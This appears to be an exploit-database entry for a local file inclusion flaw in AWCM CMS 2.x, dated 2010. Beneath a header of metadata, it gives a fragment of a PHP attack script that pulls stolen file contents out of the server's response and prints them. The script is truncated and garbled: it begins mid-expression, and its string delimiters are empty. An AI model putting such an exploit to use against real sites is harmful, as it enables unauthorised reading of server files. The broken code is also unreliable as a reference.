# Exploit Title: Awcm Cms Local File Inclusion Vulnerability # Author: SwEET-DeViL # Published: 10-6-2010 # Software Link: http://www.awcm-cms.com/ # Download Software: http://sourceforge.net/projects/awcm/ # Version: 2.x # Tested on: Lunix Exploit : ",$data); $EXx = explode("",$EXc[1]); $CODE = strip_tags($EXx[0]); $CODE2 = preg_replace("/\r|\t/",'',$CODE); $CODE2 = trim($CODE2); if (empty($CODE2)){ print (' [-] Error : Sorry! File not Found '); }else{ print (' [+] ------------------------------------------------------------ ').$CODE2; print (' ------------------------------------------------------------ '); } ?>